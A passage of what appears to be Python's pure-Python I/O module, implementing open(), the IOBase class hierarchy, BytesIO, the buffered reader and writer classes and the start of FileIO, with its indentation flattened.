the given string.
    closefd is a bool. If closefd is False, the underlying file descriptor will
be kept open when the file is closed. This does not work when a file name is
given and must be True in that case.
The newly created file is non-inheritable.
A custom opener can be used by passing a callable as *opener*. The
underlying file descriptor for the file object is then obtained by calling
*opener* with (*file*, *flags*). *opener* must return an open file
descriptor (passing os.open as *opener* results in functionality similar to
passing None).
open() returns a file object whose type depends on the mode, and
through which the standard file operations such as reading and writing
are performed. When open() is used to open a file in a text mode ('w',
'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
a file in a binary mode, the returned class varies: in read binary
mode, it returns a BufferedReader; in write binary and append binary
modes, it returns a BufferedWriter, and in read/write mode, it returns
a BufferedRandom.
It is also possible to use a string or bytearray as a file for both
reading and writing. For strings StringIO can be used like a file
opened in a text mode, and for bytes a BytesIO can be used like a file
opened in a binary mode.
"""
if not isinstance(file, int):
file = os.fspath(file)
if not isinstance(file, (str, bytes, int)):
raise TypeError("invalid file: %r" % file)
if not isinstance(mode, str):
raise TypeError("invalid mode: %r" % mode)
if not isinstance(buffering, int):
raise TypeError("invalid buffering: %r" % buffering)
if encoding is not None and not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if errors is not None and not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
modes = set(mode)
if modes - set("axrwb+tU") or len(mode) > len(modes):
raise ValueError("invalid mode: %r" % mode)
creating = "x" in modes
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
updating = "+" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if creating or writing or appending or updating:
raise ValueError("mode U cannot be combined with 'x', 'w', 'a', or '+'")
import warnings
warnings.warn("'U' mode is deprecated",
DeprecationWarning, 2)
reading = True
if text and binary:
raise ValueError("can't have text and binary mode at once")
if creating + reading + writing + appending > 1:
raise ValueError("can't have read/write/append mode at once")
if not (creating or reading or writing or appending):
raise ValueError("must have exactly one of read/write/append mode")
if binary and encoding is not None:
raise ValueError("binary mode doesn't take an encoding argument")
if binary and errors is not None:
raise ValueError("binary mode doesn't take an errors argument")
if binary and newline is not None:
raise ValueError("binary mode doesn't take a newline argument")
if binary and buffering == 1:
import warnings
warnings.warn("line buffering (buffering=1) isn't supported in binary "
"mode, the default buffer size will be used",
RuntimeWarning, 2)
raw = FileIO(file,
(creating and "x" or "") +
(reading and "r" or "") +
(writing and "w" or "") +
(appending and "a" or "") +
(updating and "+" or ""),
closefd, opener=opener)
result = raw
try:
line_buffering = False
if buffering == 1 or buffering < 0 and raw.isatty():
buffering = -1
line_buffering = True
if buffering < 0:
buffering = DEFAULT_BUFFER_SIZE
try:
bs = os.fstat(raw.fileno()).st_blksize
except (OSError, AttributeError):
pass
else:
if bs > 1:
buffering = bs
if buffering < 0:
raise ValueError("invalid buffering size")
if buffering == 0:
if binary:
return result
raise ValueError("can't have unbuffered text I/O")
if updating:
buffer = BufferedRandom(raw, buffering)
elif creating or writing or appending:
buffer = BufferedWriter(raw, buffering)
elif reading:
buffer = BufferedReader(raw, buffering)
else:
raise ValueError("unknown mode: %r" % mode)
result = buffer
if binary:
return result
text = TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
result = text
text.mode = mode
return result
except:
result.close()
raise
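# A couple of illustrative uses of open(), kept as comments so this module has
# no import-time side effects; the file names are placeholders.
#
#   with open("data.bin", "rb", buffering=0) as raw:    # unbuffered: returns a FileIO
#       header = raw.read(16)
#   with open("log.txt", "a", encoding="utf-8") as f:   # buffered text: TextIOWrapper
#       f.write("appended line\n")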
# Define a default pure-Python implementation for open_code()
# that does not allow hooks. Warn on first use. Defined for tests.
def _open_code_with_warning(path):
"""Opens the provided file with mode ``'rb'``. This function
should be used when the intent is to treat the contents as
executable code.
``path`` should be an absolute path.
When supported by the runtime, this function can be hooked
in order to allow embedders more control over code files.
This functionality is not supported on the current runtime.
"""
import warnings
warnings.warn("_pyio.open_code() may not be using hooks",
RuntimeWarning, 2)
return open(path, "rb")
try:
open_code = io.open_code
except AttributeError:
open_code = _open_code_with_warning
class DocDescriptor:
"""Helper for builtins.open.__doc__
"""
def __get__(self, obj, typ=None):
return (
"open(file, mode='r', buffering=-1, encoding=None, "
"errors=None, newline=None, closefd=True)\n\n" +
open.__doc__)
class OpenWrapper:
"""Wrapper for builtins.open
Trick so that open won't become a bound method when stored
as a class variable (as dbm.dumb does).
See initstdio() in Python/pylifecycle.c.
"""
__doc__ = DocDescriptor()
def __new__(cls, *args, **kwargs):
return open(*args, **kwargs)
# In normal operation, both `UnsupportedOperation`s should be bound to the
# same object.
try:
UnsupportedOperation = io.UnsupportedOperation
except AttributeError:
class UnsupportedOperation(OSError, ValueError):
pass
class IOBase(metaclass=abc.ABCMeta):
"""The abstract base class for all I/O classes, acting on streams of
bytes. There is no public constructor.
This class provides dummy implementations for many methods that
derived classes can override selectively; the default implementations
represent a file that cannot be read, written or seeked.
Even though IOBase does not declare read or write because
their signatures will vary, implementations and clients should
consider those methods part of the interface. Also, implementations
may raise UnsupportedOperation when operations they do not support are
called.
The basic type used for binary data read from or written to a file is
bytes. Other bytes-like objects are accepted as method arguments too.
Text I/O classes work with str data.
Note that calling any method (even inquiries) on a closed stream is
undefined. Implementations may raise OSError in this case.
IOBase (and its subclasses) support the iterator protocol, meaning
that an IOBase object can be iterated over yielding the lines in a
stream.
IOBase also supports the :keyword:`with` statement. In this example,
fp is closed after the suite of the with statement is complete:
    with open('spam.txt', 'w') as fp:
fp.write('Spam and eggs!')
"""
### Internal ###
def _unsupported(self, name):
"""Internal: raise an OSError exception for unsupported operations."""
raise UnsupportedOperation("%s.%s() not supported" %
(self.__class__.__name__, name))
### Positioning ###
def seek(self, pos, whence=0):
"""Change stream position.
Change the stream position to byte offset pos. Argument pos is
interpreted relative to the position indicated by whence. Values
for whence are ints:
* 0 -- start of stream (the default); offset should be zero or positive
* 1 -- current stream position; offset may be negative
* 2 -- end of stream; offset is usually negative
Some operating systems / file systems could provide additional values.
Return an int indicating the new absolute position.
"""
self._unsupported("seek")
def tell(self):
"""Return an int indicating the current stream position."""
return self.seek(0, 1)
def truncate(self, pos=None):
"""Truncate file to size bytes.
Size defaults to the current IO position as reported by tell(). Return
the new size.
"""
self._unsupported("truncate")
### Flush and close ###
def flush(self):
"""Flush write buffers, if applicable.
This is not implemented for read-only and non-blocking streams.
"""
self._checkClosed()
# XXX Should this return the number of bytes written???
__closed = False
def close(self):
"""Flush and close the IO object.
This method has no effect if the file is already closed.
"""
if not self.__closed:
try:
self.flush()
finally:
self.__closed = True
def __del__(self):
"""Destructor. Calls close()."""
try:
closed = self.closed
except AttributeError:
# If getting closed fails, then the object is probably
# in an unusable state, so ignore.
return
if closed:
return
if _IOBASE_EMITS_UNRAISABLE:
self.close()
else:
# The try/except block is in case this is called at program
# exit time, when it's possible that globals have already been
# deleted, and then the close() call might fail. Since
# there's nothing we can do about such failures and they annoy
# the end users, we suppress the traceback.
try:
self.close()
except:
pass
### Inquiries ###
def seekable(self):
"""Return a bool indicating whether object supports random access.
If False, seek(), tell() and truncate() will raise OSError.
This method may need to do a test seek().
"""
return False
def _checkSeekable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not seekable
"""
if not self.seekable():
raise UnsupportedOperation("File or stream is not seekable."
if msg is None else msg)
def readable(self):
"""Return a bool indicating whether object was opened for reading.
If False, read() will raise OSError.
"""
return False
def _checkReadable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not readable
"""
if not self.readable():
raise UnsupportedOperation("File or stream is not readable."
if msg is None else msg)
def writable(self):
"""Return a bool indicating whether object was opened for writing.
If False, write() and truncate() will raise OSError.
"""
return False
def _checkWritable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not writable
"""
if not self.writable():
raise UnsupportedOperation("File or stream is not writable."
if msg is None else msg)
@property
def closed(self):
"""closed: bool. True iff the file has been closed.
For backwards compatibility, this is a property, not a predicate.
"""
return self.__closed
def _checkClosed(self, msg=None):
"""Internal: raise a ValueError if file is closed
"""
if self.closed:
raise ValueError("I/O operation on closed file."
if msg is None else msg)
### Context manager ###
def __enter__(self): # That's a forward reference
"""Context management protocol. Returns self (an instance of IOBase)."""
self._checkClosed()
return self
def __exit__(self, *args):
"""Context management protocol. Calls close()"""
self.close()
### Lower-level APIs ###
# XXX Should these be present even if unimplemented?
def fileno(self):
"""Returns underlying file descriptor (an int) if one exists.
An OSError is raised if the IO object does not use a file descriptor.
"""
self._unsupported("fileno")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Return False if it can't be determined.
"""
self._checkClosed()
return False
### Readline[s] and writelines ###
def readline(self, size=-1):
r"""Read and return a line of bytes from the stream.
If size is specified, at most size bytes will be read.
Size should be an int.
The line terminator is always b'\n' for binary files; for text
files, the newlines argument to open can be used to select the line
terminator(s) recognized.
"""
# For backwards compatibility, a (slowish) readline().
if hasattr(self, "peek"):
def nreadahead():
readahead = self.peek(1)
if not readahead:
return 1
n = (readahead.find(b"\n") + 1) or len(readahead)
if size >= 0:
n = min(n, size)
return n
else:
def nreadahead():
return 1
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
res = bytearray()
while size < 0 or len(res) < size:
b = self.read(nreadahead())
if not b:
break
res += b
if res.endswith(b"\n"):
break
return bytes(res)
def __iter__(self):
self._checkClosed()
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
def readlines(self, hint=None):
"""Return a list of lines from the stream.
hint can be specified to control the number of lines read: no more
lines will be read if the total size (in bytes/characters) of all
lines so far exceeds hint.
"""
if hint is None or hint <= 0:
return list(self)
n = 0
lines = []
for line in self:
lines.append(line)
n += len(line)
if n >= hint:
break
return lines
def writelines(self, lines):
"""Write a list of lines to the stream.
Line separators are not added, so it is usual for each of the lines
provided to have a line separator at the end.
"""
self._checkClosed()
for line in lines:
self.write(line)
io.IOBase.register(IOBase)
class RawIOBase(IOBase):
"""Base class for raw binary I/O."""
# The read() method is implemented by calling readinto(); derived
# classes that want to support read() only need to implement
# readinto() as a primitive operation. In general, readinto() can be
# more efficient than read().
# (It would be tempting to also provide an implementation of
# readinto() in terms of read(), in case the latter is a more suitable
# primitive operation, but that would lead to nasty recursion in case
# a subclass doesn't implement either.)
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
Returns an empty bytes object on EOF, or None if the object is
set not to block and has no data to read.
"""
if size is None:
size = -1
if size < 0:
return self.readall()
b = bytearray(size.__index__())
n = self.readinto(b)
if n is None:
return None
del b[n:]
return bytes(b)
def readall(self):
"""Read until EOF, using multiple read() call."""
res = bytearray()
while True:
data = self.read(DEFAULT_BUFFER_SIZE)
if not data:
break
res += data
if res:
return bytes(res)
else:
# b'' or None
return data
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Returns an int representing the number of bytes read (0 for EOF), or
None if the object is set not to block and has no data to read.
"""
self._unsupported("readinto")
def write(self, b):
"""Write the given buffer to the IO stream.
Returns the number of bytes written, which may be less than the
length of b in bytes.
"""
self._unsupported("write")
io.RawIOBase.register(RawIOBase)
from _io import FileIO
RawIOBase.register(FileIO)
class BufferedIOBase(IOBase):
"""Base class for buffered IO objects.
The main difference with RawIOBase is that the read() method
supports omitting the size argument, and does not have a default
implementation that defers to readinto().
In addition, read(), readinto() and write() may raise
BlockingIOError if the underlying raw stream is in non-blocking
mode and not ready; unlike their raw counterparts, they will never
return None.
A typical implementation should not inherit from a RawIOBase
implementation, but wrap one.
"""
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
If the argument is omitted, None, or negative, reads and
returns all data until EOF.
If the argument is positive, and the underlying raw stream is
not 'interactive', multiple raw reads may be issued to satisfy
the byte count (unless EOF is reached first). But for
interactive raw streams (XXX and for pipes?), at most one raw
read will be issued, and a short result does not imply that
EOF is imminent.
Returns an empty bytes array on EOF.
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
self._unsupported("read")
def read1(self, size=-1):
"""Read up to size bytes with at most one read() system call,
where size is an int.
"""
self._unsupported("read1")
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Like read(), this may issue multiple reads to the underlying raw
stream, unless the latter is 'interactive'.
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=False)
def readinto1(self, b):
"""Read bytes into buffer *b*, using at most one system call
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=True)
def _readinto(self, b, read1):
if not isinstance(b, memoryview):
b = memoryview(b)
b = b.cast('B')
if read1:
data = self.read1(len(b))
else:
data = self.read(len(b))
n = len(data)
b[:n] = data
return n
def write(self, b):
"""Write the given bytes buffer to the IO stream.
Return the number of bytes written, which is always the length of b
in bytes.
Raises BlockingIOError if the buffer is full and the
underlying raw stream cannot accept more data at the moment.
"""
self._unsupported("write")
def detach(self):
"""
Separate the underlying raw stream from the buffer and return it.
After the raw stream has been detached, the buffer is in an unusable
state.
"""
self._unsupported("detach")
io.BufferedIOBase.register(BufferedIOBase)
class _BufferedIOMixin(BufferedIOBase):
"""A mixin implementation of BufferedIOBase with an underlying raw stream.
This passes most requests on to the underlying raw stream. It
does *not* provide implementations of read(), readinto() or
write().
"""
def __init__(self, raw):
self._raw = raw
### Positioning ###
def seek(self, pos, whence=0):
new_position = self.raw.seek(pos, whence)
if new_position < 0:
raise OSError("seek() returned an invalid position")
return new_position
def tell(self):
pos = self.raw.tell()
if pos < 0:
raise OSError("tell() returned an invalid position")
return pos
def truncate(self, pos=None):
# Flush the stream. We're mixing buffered I/O with lower-level I/O,
# and a flush may be necessary to synch both views of the current
# file state.
self.flush()
if pos is None:
pos = self.tell()
# XXX: Should seek() be used, instead of passing the position
# XXX directly to truncate?
return self.raw.truncate(pos)
### Flush and close ###
def flush(self):
if self.closed:
raise ValueError("flush on closed file")
self.raw.flush()
def close(self):
if self.raw is not None and not self.closed:
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
self.raw.close()
def detach(self):
if self.raw is None:
raise ValueError("raw stream already detached")
self.flush()
raw = self._raw
self._raw = None
return raw
### Inquiries ###
def seekable(self):
return self.raw.seekable()
@property
def raw(self):
return self._raw
@property
def closed(self):
return self.raw.closed
@property
def name(self):
return self.raw.name
@property
def mode(self):
return self.raw.mode
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
modname = self.__class__.__module__
clsname = self.__class__.__qualname__
try:
name = self.name
except AttributeError:
return "<{}.{}>".format(modname, clsname)
else:
return "<{}.{} name={!r}>".format(modname, clsname, name)
### Lower-level APIs ###
def fileno(self):
return self.raw.fileno()
def isatty(self):
return self.raw.isatty()
class BytesIO(BufferedIOBase):
"""Buffered I/O implementation using an in-memory bytes buffer."""
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
def __init__(self, initial_bytes=None):
buf = bytearray()
if initial_bytes is not None:
buf += initial_bytes
self._buffer = buf
self._pos = 0
def __getstate__(self):
if self.closed:
raise ValueError("__getstate__ on closed file")
return self.__dict__.copy()
def getvalue(self):
"""Return the bytes value (contents) of the buffer
"""
if self.closed:
raise ValueError("getvalue on closed file")
return bytes(self._buffer)
def getbuffer(self):
"""Return a readable and writable view of the buffer.
"""
if self.closed:
raise ValueError("getbuffer on closed file")
return memoryview(self._buffer)
def close(self):
if self._buffer is not None:
self._buffer.clear()
super().close()
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
if size < 0:
size = len(self._buffer)
if len(self._buffer) <= self._pos:
return b""
newpos = min(len(self._buffer), self._pos + size)
b = self._buffer[self._pos : newpos]
self._pos = newpos
return bytes(b)
def read1(self, size=-1):
"""This is the same as read.
"""
return self.read(size)
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with memoryview(b) as view:
n = view.nbytes # Size of any bytes-like object
if n == 0:
return 0
pos = self._pos
if pos > len(self._buffer):
# Inserts null bytes between the current end of the file
# and the new write position.
padding = b'\x00' * (pos - len(self._buffer))
self._buffer += padding
self._buffer[pos:pos + n] = b
self._pos += n
return n
def seek(self, pos, whence=0):
if self.closed:
raise ValueError("seek on closed file")
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if whence == 0:
if pos < 0:
raise ValueError("negative seek position %r" % (pos,))
self._pos = pos
elif whence == 1:
self._pos = max(0, self._pos + pos)
elif whence == 2:
self._pos = max(0, len(self._buffer) + pos)
else:
raise ValueError("unsupported whence value")
return self._pos
def tell(self):
if self.closed:
raise ValueError("tell on closed file")
return self._pos
def truncate(self, pos=None):
if self.closed:
raise ValueError("truncate on closed file")
if pos is None:
pos = self._pos
else:
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if pos < 0:
raise ValueError("negative truncate position %r" % (pos,))
del self._buffer[pos:]
return pos
def readable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def writable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
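# Illustrative BytesIO behaviour (comments only): getvalue() returns a copy of
# the contents, while getbuffer() returns a writable memoryview that edits the
# buffer in place.
#
#   b = BytesIO(b"hello world")
#   b.seek(6)
#   b.write(b"there")            # buffer is now b"hello there"
#   with b.getbuffer() as view:
#       view[0:5] = b"HELLO"     # in-place edit through the view
#   b.getvalue()                 # b"HELLO there"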
class BufferedReader(_BufferedIOMixin):
"""BufferedReader(raw[, buffer_size])
    A buffer for a readable, sequential RawIOBase object.
The constructor creates a BufferedReader for the given readable raw
stream and buffer_size. If buffer_size is omitted, DEFAULT_BUFFER_SIZE
is used.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
"""Create a new buffered reader using the given readable raw IO object.
"""
if not raw.readable():
raise OSError('"raw" argument must be readable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._reset_read_buf()
self._read_lock = Lock()
def readable(self):
return self.raw.readable()
def _reset_read_buf(self):
self._read_buf = b""
self._read_pos = 0
def read(self, size=None):
"""Read size bytes.
Returns exactly size bytes of data unless the underlying raw IO
stream reaches EOF or if the call would block in non-blocking
mode. If size is negative, read until EOF or until read() would
block.
"""
if size is not None and size < -1:
raise ValueError("invalid number of bytes to read")
with self._read_lock:
return self._read_unlocked(size)
def _read_unlocked(self, n=None):
nodata_val = b""
empty_values = (b"", None)
buf = self._read_buf
pos = self._read_pos
# Special case for when the number of bytes to read is unspecified.
if n is None or n == -1:
self._reset_read_buf()
if hasattr(self.raw, 'readall'):
chunk = self.raw.readall()
if chunk is None:
return buf[pos:] or None
else:
return buf[pos:] + chunk
chunks = [buf[pos:]] # Strip the consumed bytes.
current_size = 0
while True:
# Read until EOF or until read() would block.
chunk = self.raw.read()
if chunk in empty_values:
nodata_val = chunk
break
current_size += len(chunk)
chunks.append(chunk)
return b"".join(chunks) or nodata_val
# The number of bytes to read is specified, return at most n bytes.
avail = len(buf) - pos # Length of the available buffered data.
if n <= avail:
# Fast path: the data to read is fully buffered.
self._read_pos += n
return buf[pos:pos+n]
# Slow path: read from the stream until enough bytes are read,
# or until an EOF occurs or until read() would block.
chunks = [buf[pos:]]
wanted = max(self.buffer_size, n)
while avail < n:
chunk = self.raw.read(wanted)
if chunk in empty_values:
nodata_val = chunk
break
avail += len(chunk)
chunks.append(chunk)
# n is more than avail only when an EOF occurred or when
# read() would have blocked.
n = min(n, avail)
out = b"".join(chunks)
self._read_buf = out[n:] # Save the extra data in the buffer.
self._read_pos = 0
return out[:n] if out else nodata_val
def peek(self, size=0):
"""Returns buffered bytes without advancing the position.
The argument indicates a desired minimal number of bytes; we
do at most one raw read to satisfy it. We never return more
than self.buffer_size.
"""
with self._read_lock:
return self._peek_unlocked(size)
def _peek_unlocked(self, n=0):
want = min(n, self.buffer_size)
have = len(self._read_buf) - self._read_pos
if have < want or have <= 0:
to_read = self.buffer_size - have
current = self.raw.read(to_read)
if current:
self._read_buf = self._read_buf[self._read_pos:] + current
self._read_pos = 0
return self._read_buf[self._read_pos:]
def read1(self, size=-1):
"""Reads up to size bytes, with at most one read() system call."""
# Returns up to size bytes. If at least one byte is buffered, we
# only return buffered bytes. Otherwise, we do one raw read.
if size < 0:
size = self.buffer_size
if size == 0:
return b""
with self._read_lock:
self._peek_unlocked(1)
return self._read_unlocked(
min(size, len(self._read_buf) - self._read_pos))
# Implementing readinto() and readinto1() is not strictly necessary (we
# could rely on the base class that provides an implementation in terms of
# read() and read1()). We do it anyway to keep the _pyio implementation
# similar to the io implementation (which implements the methods for
# performance reasons).
def _readinto(self, buf, read1):
"""Read data into *buf* with at most one system call."""
# Need to create a memoryview object of type 'b', otherwise
# we may not be able to assign bytes to it, and slicing it
# would create a new object.
if not isinstance(buf, memoryview):
buf = memoryview(buf)
if buf.nbytes == 0:
return 0
buf = buf.cast('B')
written = 0
with self._read_lock:
while written < len(buf):
# First try to read from internal buffer
avail = min(len(self._read_buf) - self._read_pos, len(buf))
if avail:
buf[written:written+avail] = \
self._read_buf[self._read_pos:self._read_pos+avail]
self._read_pos += avail
written += avail
if written == len(buf):
break
# If remaining space in callers buffer is larger than
# internal buffer, read directly into callers buffer
if len(buf) - written > self.buffer_size:
n = self.raw.readinto(buf[written:])
if not n:
break # eof
written += n
# Otherwise refill internal buffer - unless we're
# in read1 mode and already got some data
elif not (read1 and written):
if not self._peek_unlocked(1):
break # eof
# In readinto1 mode, return as soon as we have some data
if read1 and written:
break
return written
def tell(self):
return _BufferedIOMixin.tell(self) - len(self._read_buf) + self._read_pos
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._read_lock:
if whence == 1:
pos -= len(self._read_buf) - self._read_pos
pos = _BufferedIOMixin.seek(self, pos, whence)
self._reset_read_buf()
return pos
class BufferedWriter(_BufferedIOMixin):
"""A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
if not raw.writable():
raise OSError('"raw" argument must be writable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._write_buf = bytearray()
self._write_lock = Lock()
def writable(self):
return self.raw.writable()
def write(self, b):
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
if self.closed:
raise ValueError("write to closed file")
# XXX we can implement some more tricks to try and avoid
# partial writes
if len(self._write_buf) > self.buffer_size:
# We're full, so let's pre-flush the buffer. (This may
# raise BlockingIOError with characters_written == 0.)
self._flush_unlocked()
before = len(self._write_buf)
self._write_buf.extend(b)
written = len(self._write_buf) - before
if len(self._write_buf) > self.buffer_size:
try:
self._flush_unlocked()
except BlockingIOError as e:
if len(self._write_buf) > self.buffer_size:
# We've hit the buffer_size. We have to accept a partial
# write and cut back our buffer.
overage = len(self._write_buf) - self.buffer_size
written -= overage
self._write_buf = self._write_buf[:self.buffer_size]
raise BlockingIOError(e.errno, e.strerror, written)
return written
def truncate(self, pos=None):
with self._write_lock:
self._flush_unlocked()
if pos is None:
pos = self.raw.tell()
return self.raw.truncate(pos)
def flush(self):
with self._write_lock:
self._flush_unlocked()
def _flush_unlocked(self):
if self.closed:
raise ValueError("flush on closed file")
while self._write_buf:
try:
n = self.raw.write(self._write_buf)
except BlockingIOError:
raise RuntimeError("self.raw should implement RawIOBase: it "
"should not raise BlockingIOError")
if n is None:
raise BlockingIOError(
errno.EAGAIN,
"write could not complete without blocking", 0)
if n > len(self._write_buf) or n < 0:
raise OSError("write() returned incorrect number of bytes")
del self._write_buf[:n]
def tell(self):
return _BufferedIOMixin.tell(self) + len(self._write_buf)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._write_lock:
self._flush_unlocked()
return _BufferedIOMixin.seek(self, pos, whence)
def close(self):
with self._write_lock:
if self.raw is None or self.closed:
return
# We have to release the lock and call self.flush() (which will
# probably just re-take the lock) in case flush has been overridden in
# a subclass or the user set self.flush to something. This is the same
# behavior as the C implementation.
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
with self._write_lock:
self.raw.close()
class BufferedRWPair(BufferedIOBase):
"""A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
# XXX The usefulness of this (compared to having two separate IO
# objects) is questionable.
def __init__(self, reader, writer, buffer_size=DEFAULT_BUFFER_SIZE):
"""Constructor.
The arguments are two RawIO instances.
"""
if not reader.readable():
raise OSError('"reader" argument must be readable.')
if not writer.writable():
raise OSError('"writer" argument must be writable.')
self.reader = BufferedReader(reader, buffer_size)
self.writer = BufferedWriter(writer, buffer_size)
def read(self, size=-1):
if size is None:
size = -1
return self.reader.read(size)
def readinto(self, b):
return self.reader.readinto(b)
def write(self, b):
return self.writer.write(b)
def peek(self, size=0):
return self.reader.peek(size)
def read1(self, size=-1):
return self.reader.read1(size)
def readinto1(self, b):
return self.reader.readinto1(b)
def readable(self):
return self.reader.readable()
def writable(self):
return self.writer.writable()
def flush(self):
return self.writer.flush()
def close(self):
try:
self.writer.close()
finally:
self.reader.close()
def isatty(self):
return self.reader.isatty() or self.writer.isatty()
@property
def closed(self):
return self.writer.closed
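# A small usage sketch (comments only): BufferedRWPair wraps two one-way raw
# streams, for example the two ends of an os.pipe(); the fds and sizes below
# are illustrative.
#
#   r_fd, w_fd = os.pipe()
#   pair = BufferedRWPair(FileIO(r_fd, "r"), FileIO(w_fd, "w"))
#   pair.write(b"ping")
#   pair.flush()
#   pair.read(4)                 # b"ping"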
class BufferedRandom(BufferedWriter, BufferedReader):
"""A buffered interface to random access streams.
The constructor creates a reader and writer for a seekable stream,
raw, given in the first argument. If the buffer_size is omitted it
defaults to DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
raw._checkSeekable()
BufferedReader.__init__(self, raw, buffer_size)
BufferedWriter.__init__(self, raw, buffer_size)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
self.flush()
if self._read_buf:
# Undo read ahead.
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
# First do the raw seek, then empty the read buffer, so that
# if the raw seek fails, we don't lose buffered data forever.
pos = self.raw.seek(pos, whence)
with self._read_lock:
self._reset_read_buf()
if pos < 0:
raise OSError("seek() returned invalid position")
return pos
def tell(self):
if self._write_buf:
return BufferedWriter.tell(self)
else:
return BufferedReader.tell(self)
def truncate(self, pos=None):
if pos is None:
pos = self.tell()
# Use seek to flush the read buffer.
return BufferedWriter.truncate(self, pos)
def read(self, size=None):
if size is None:
size = -1
self.flush()
return BufferedReader.read(self, size)
def readinto(self, b):
self.flush()
return BufferedReader.readinto(self, b)
def peek(self, size=0):
self.flush()
return BufferedReader.peek(self, size)
def read1(self, size=-1):
self.flush()
return BufferedReader.read1(self, size)
def readinto1(self, b):
self.flush()
return BufferedReader.readinto1(self, b)
def write(self, b):
if self._read_buf:
# Undo readahead
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
self._reset_read_buf()
return BufferedWriter.write(self, b)
class FileIO(RawIOBase):
_fd = -1
_created = False
_readable = False
_writable = False
_appending = False
_seekable = None
_closefd = True
def __init__(self, file, mode='r', closefd=True, opener=None):
"""Open a file. The mode can be 'r' (default), 'w', 'x' or 'a' for reading,
writing, exclusive creation or appending. The file will be created if it
doesn't exist when opened for writing or appending; it will be truncated
when opened for writing. A FileExistsError will be raised if it already
exists when opened for creating. Opening a file for creating implies
writing so this mode behaves in a similar way to 'w'. Add a '+' to the mode
to allow simultaneous reading and writing. A custom opener can be used by
passing a callable as *opener*. The underlying file descriptor for the file
object is then obtained by calling opener with (*name*, *flags*).
*opener* must return an open file descriptor (passing os.open as *opener*
results in functionality similar to passing None).
"""
if self._fd >= 0:
# Have to close the existing file first.
try:
if self._closefd:
os.close(self._fd)
finally:
self._fd = -1
if isinstance(file, float):
raise TypeError('integer argument expected, got float')
if isinstance(file, int):
fd = file
if fd < 0:
raise ValueError('negative file descriptor')
else:
fd = -1
if not isinstance(mode, str):
raise TypeError('invalid mode: %s' % (mode,))
if not set(mode) <= set('xrwab+'):
raise ValueError('invalid mode: %s' % (mode,))
if sum(c in 'rwax' for c in mode) != 1 or mode.count('+') > 1:
raise ValueError('Must have exactly one of create/read/write/append '
'mode and at most one plus')
if 'x' in mode:
self._created = True
self._writable = True
flags = os.O_EXCL | os.O_CREAT
elif 'r' in mode:
self._readable = True
flags = 0
elif 'w' in mode:
self._writable = True
flags = os.O_CREAT | os.O_TRUNC
elif 'a' in mode:
self._writable = True
self._appending = True
flags = os.O_APPEND | os.O_CREAT
if '+' in mode:
self._readable = True
self._writable = True
if self._readable and self._writable:
flags |= os.O_RDWR
elif self._readable:
flags |= os.O_RDONLY
else:
flags |= os.O_WRONLY
flags |= getattr(os, 'O_BINARY', 0)
noinherit_flag = (getattr(os, 'O_NOINHERIT', 0) or
getattr(os, 'O_CLOEXEC', 0))
